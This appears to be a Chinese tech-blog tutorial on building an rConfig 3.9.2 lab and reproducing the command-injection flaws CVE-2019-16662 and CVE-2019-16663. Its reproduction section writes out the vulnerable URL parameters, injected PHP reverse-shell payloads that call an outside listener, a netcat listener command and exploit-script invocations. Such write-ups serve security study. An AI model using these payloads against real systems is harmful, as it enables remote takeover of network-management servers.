如何进行rConfig-CVE漏洞复现及环境搭建

发布时间:2021-12-10 16:32:24 作者:柒染
来源:亿速云 阅读:489

今天就跟大家聊聊有关如何进行rConfig-CVE漏洞复现及环境搭建,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

rConfig是一个开放源代码的网络设备配置管理实用程序,网络工程师可以使用它来频繁获取其网络设备的配置快照。rConfig是唯一的,因为您选择要针对设备运行的命令。

只需使用要应用于设备类别的命令列表配置rConfig,然后将设备添加到该类别。创建一个计划任务,其余工作由rConfig完成。现在,rConfig版本3具有配置符合性管理实用程序,使您可以监视设备配置以符合策略。

如何进行rConfig-CVE漏洞复现及环境搭建

一、环境搭建

rConfig安装

cd /home

curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"

chmod +x install_rConfig.sh

./install_rConfig.sh

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

运行文件安装发现报错 我们打开源码看看为什么连接不上

如何进行rConfig-CVE漏洞复现及环境搭建

结果发现会curl访问一下谷歌来判断是否有网 我们可以直接改成www.baidu.com,但是后面安装可能会刚问一写被墙的连接,所以我们保险起见,挂个代理把!!!我这里用的是proxychains4代理的我内网的一个ss。

如何进行rConfig-CVE漏洞复现及环境搭建

然后就可以直接正常安装了。

如何进行rConfig-CVE漏洞复现及环境搭建

安装完成之后会有一个centos7_postReboot.sh文件

如何进行rConfig-CVE漏洞复现及环境搭建

我们接着运行一下 就可以看见已经安装完成了。剩下就去web页面配置了。

如何进行rConfig-CVE漏洞复现及环境搭建

进入https://192.168.157.130/install页面进行后续安装

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

 

到此安装均已完成,默认账号密码为admin admin。

二、漏洞复现

rConfig 3.9.2及更低版本中的未经身份验证的命令执行漏洞。安装后,安装目录不会自动删除,这允许未经身份验证的用户通过ajaxServerSettingsChk.php文件作为Web服务器用户执行任意命令。

CVE-2019-16662 rConfig3.9.2远程命令执行漏洞复现:

为了直观,我自己在服务器上搭建了一个rConfig3.9.2系统,现在我们来抓包复现一下漏洞

如何进行rConfig-CVE漏洞复现及环境搭建

我们将路径替换成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

如何进行rConfig-CVE漏洞复现及环境搭建

下面我们需要将命令执行一道url编码 然后再填入参数即可。

如何进行rConfig-CVE漏洞复现及环境搭建

如何进行rConfig-CVE漏洞复现及环境搭建

已经输出了我们的回显,现在我们来弹个shell试一下

将url编码;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何进行rConfig-CVE漏洞复现及环境搭建

另一个外网服务器进行监听 nc -lvnp 6633

如何进行rConfig-CVE漏洞复现及环境搭建

添加参数发送请求,可以看到已经反弹到shell了。

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16662Exp脚本利用

如何进行rConfig-CVE漏洞复现及环境搭建

python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16663 rConfig3.9.2远程命令执行漏洞复现

这个RCE需要身份验证才能执行,存在lib/crud/search.crud.php这个文件里。

如何进行rConfig-CVE漏洞复现及环境搭建

登录成功之后进行抓包 替换成RCE的路径 将反弹shell的payload进行编码

""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何进行rConfig-CVE漏洞复现及环境搭建

监听,反弹,成功

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-16663 EXP利用

如何进行rConfig-CVE漏洞复现及环境搭建

python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

如何进行rConfig-CVE漏洞复现及环境搭建

CVE-2019-19509 rConfig3.9.3远程命令执行漏洞

由于3.9.3的安装包被官方删除和下架了,现在无法复现,但网上已有Exp。

如何进行rConfig-CVE漏洞复现及环境搭建

看完上述内容,你们对如何进行rConfig-CVE漏洞复现及环境搭建有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

推荐阅读:
  1. Nginx 解析漏洞复现
  2. 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

rconfig cve

上一篇:如何进行4399AT自动化测试工具环境搭建

下一篇:如何进行Revit二次开发环境平台的搭建

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》